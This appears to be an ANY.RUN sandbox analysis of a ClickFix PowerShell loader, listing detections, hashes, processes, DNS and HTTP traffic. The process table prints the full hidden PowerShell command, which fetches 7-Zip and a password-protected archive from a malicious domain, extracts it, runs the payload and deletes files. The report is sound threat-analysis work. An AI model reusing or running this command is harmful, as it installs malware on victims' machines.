File name:

powershell_stage2.ps1

Full analysis: https://app.any.run/tasks/47887b1e-a16c-4957-80cf-1e1a19267d58
Verdict: Malicious activity
Threats:

ClickFix is a sophisticated social engineering technique that tricks users into manually executing malicious commands on their devices. It masquerades as a "quick fix" for fake technical issues, CAPTCHA verifications, or error messages, often hijacking the clipboard to paste harmful PowerShell or terminal commands. This user-assisted approach helps it bypass traditional security controls, leading to infostealers like Lumma Stealer, RATs, and other malware.

Analysis date: May 07, 2026, 07:45:03
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
clickfix
phishing
loader
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (1967), with no line terminators
MD5:

6E898825BF44CF00F5C2C9910C6CAF90

SHA1:

FA2C78A2DF3F4A79B49ED8D6C50C66AE2743D5C4

SHA256:

17679BB632DABA38CE441A30B4C5DA8A83B307F23505A4A035E0200ECB2E71E6

SSDEEP:

48:YSc4oOIa/8d2I/X8crXl6pkqrFVqY3S7NS7nXLGduEuve8Rssn:Rc9OcUpcDIkKFVNCQraE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8164)
    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2232)
      • powershell.exe (PID: 8164)
  • SUSPICIOUS

    • The process executes Powershell scripts

      • powershell.exe (PID: 2652)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2652)
    • Removes files via Powershell

      • powershell.exe (PID: 8164)
    • Manipulates environment variables

      • powershell.exe (PID: 8164)
    • Self-deletion pattern has been detected

      • powershell.exe (PID: 2652)
    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 8164)
    • Application launched itself

      • powershell.exe (PID: 2652)
    • Starts process via Powershell

      • powershell.exe (PID: 8164)
    • Probably obfuscated PowerShell command line is found

      • powershell.exe (PID: 2652)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 8164)
    • Hides errors and continues executing the command without stopping

      • powershell.exe (PID: 8164)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 2652)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8164)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 2652)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 8164)
    • Drops 7-zip archiver for unpacking

      • powershell.exe (PID: 8164)
  • INFO

    • The sample compiled with english language support

      • powershell.exe (PID: 8164)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
131
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
1824\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2232C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2652"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\powershell_stage2.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
6884\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
8164"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command [System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;$g7='7z';$h8='P6xHzFbMdK';$i9=Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());New-Item -ItemType Directory -Path $i9 -Force|Out-Null;$j10=Join-Path $i9 ([System.IO.Path]::GetRandomFileName()+'.exe');$k11=Join-Path $i9 ([System.IO.Path]::GetRandomFileName()+'.'+$g7);$l12=0;for($m13=0;$m13 -lt 3 -and -not $l12;$m13++){try{if(-not (Test-Path $j10)){Invoke-WebRequest -Uri 'https://best-claudns-js.beer/api/7z.exe' -OutFile $j10 -UseBasicParsing}Invoke-WebRequest -Uri 'https://best-claudns-js.beer/api/index.php?a=dl&token=3affb192292e872200f5763d6340f0426f45a4210e82287e5cb204904fc3dc9f&src=cloudflare&cb=test&ref=&mode=download' -OutFile $k11 -UseBasicParsing;if(Test-Path $k11){$l12=1}else{Start-Sleep -Seconds 2}}catch{Start-Sleep -Seconds 2}};if(-not (Test-Path $k11)){exit};$n14=Join-Path $i9 ([System.IO.Path]::GetRandomFileName());New-Item -ItemType Directory -Path $n14 -Force|Out-Null;$o15=@('x','-y');if($h8 -ne ''){$o15+=('-p'+$h8)}$o15+=('-o'+$n14);$o15+=$k11;if(Test-Path $j10){& $j10 @o15|Out-Null}else{Start-Process -FilePath $k11 -WindowStyle Hidden};$p16=Get-ChildItem -Path $n14 -Filter *.exe -Recurse -File|Select-Object -First 1;$q17=Get-ChildItem -Path $n14 -Filter *.msi -Recurse -File|Select-Object -First 1;$r18=$null;$s19=$null;if($p16){$r18=$p16.FullName;$s19=$p16.Directory.FullName}elseif($q17){$r18=$q17.FullName;$s19=$q17.Directory.FullName}else{$r18=$k11};if($r18){if($s19){Start-Process -FilePath $r18 -WorkingDirectory $s19 -WindowStyle Hidden}else{Start-Process -FilePath $r18 -WindowStyle Hidden}};try{Remove-Item -LiteralPath $k11 -Force -ErrorAction SilentlyContinue}catch{};try{if(Test-Path $j10){Remove-Item -LiteralPath $j10 -Force -ErrorAction SilentlyContinue}}catch{}; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
Total events
0
Read events
0
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
4
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
2652powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:4B226DCB6D10A1E4B98687D3E6928D2D
SHA256:2D6100825B61810B032FBA81E9DC7B85AF43D00B8154B2D8C5F149CD37EE9C93
2652powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kvvhhwu1.2zc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8164powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hyhou2gk.eg5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2652powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFdfe46.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
2652powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TO22EP38MEIPF6HMZQFT.tempbinary
MD5:B89813D18517418F16C3809E109D1E90
SHA256:14F036F923D7B2B5CEE0101EF189990B1E59193745D5916E7E5C8942022EBBA1
2652powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:B89813D18517418F16C3809E109D1E90
SHA256:14F036F923D7B2B5CEE0101EF189990B1E59193745D5916E7E5C8942022EBBA1
2652powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y4gnorc3.pmv.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8164powershell.exeC:\Users\admin\AppData\Local\Temp\xopdu51i.e4s\msama2df.e1k.exeexecutable
MD5:E96E28B3824ABF6496FD0971B3BA7459
SHA256:26817725650583D99CA3E617A618DD75C0F71BD316B5761780B7361F5F824CAD
8164powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xdxq54tv.3xg.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
25
TCP/UDP connections
25
DNS requests
18
Threats
13

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3448
svchost.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/UpdateHealthTools?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3626&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=SedimentPack&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2
US
whitelisted
4336
SIHClient.exe
GET
304
74.178.240.61:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
4336
SIHClient.exe
GET
200
20.165.94.54:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
US
whitelisted
4336
SIHClient.exe
GET
200
74.178.240.61:443
https://slscr.update.microsoft.com/sls/ping
US
whitelisted
4336
SIHClient.exe
GET
304
74.178.240.61:443
https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
5316
svchost.exe
GET
200
23.11.40.157:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAz1vQYrVgL0erhQLCPM8GY%3D
NL
binary
471 b
whitelisted
8164
powershell.exe
GET
200
178.16.52.101:443
https://best-claudns-js.beer/api/7z.exe
SC
executable
838 Kb
unknown
5276
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
5276
MoUsoCoreWorker.exe
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
5316
svchost.exe
POST
400
20.190.160.22:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
204 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3448
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5276
MoUsoCoreWorker.exe
2.16.241.19:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
5276
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
48.192.1.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
8164
powershell.exe
178.16.52.101:443
best-claudns-js.beer
OMEGATECH-AS
SC
malicious
3428
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5316
svchost.exe
20.190.160.22:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 2.16.241.19
  • 2.16.241.12
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
google.com
  • 142.251.14.138
  • 142.251.14.100
  • 142.251.14.139
  • 142.251.14.102
  • 142.251.14.101
  • 142.251.14.113
whitelisted
best-claudns-js.beer
  • 178.16.52.101
malicious
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 20.190.160.22
  • 20.190.160.128
  • 40.126.32.72
  • 20.190.160.131
  • 20.190.160.132
  • 20.190.160.5
  • 20.190.160.4
  • 40.126.32.76
whitelisted
ocsp.digicert.com
  • 23.11.40.157
whitelisted
slscr.update.microsoft.com
  • 74.178.240.61
whitelisted

Threats

PID
Process
Class
Message
8164
powershell.exe
Misc activity
INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET)
8164
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 36
2232
svchost.exe
Possible Social Engineering Attempted
PHISHING [ANY.RUN] ClickFix related domain (best-claudns-js .beer)
8164
powershell.exe
Possible Social Engineering Attempted
PHISHING [ANY.RUN] ClickFix related IP address
8164
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
8164
powershell.exe
Misc activity
ET INFO Request for EXE via Powershell
8164
powershell.exe
Possible Social Engineering Attempted
PHISHING [ANY.RUN] ClickFix Related URL Pattern (/api/index.php?a=dl&token=<HEX>{64})
8164
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
8164
powershell.exe
Possible Social Engineering Attempted
PHISHING [ANY.RUN] ClickFix Related URL Pattern (/api/index.php?a=dl&token=<HEX>{64})
8164
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info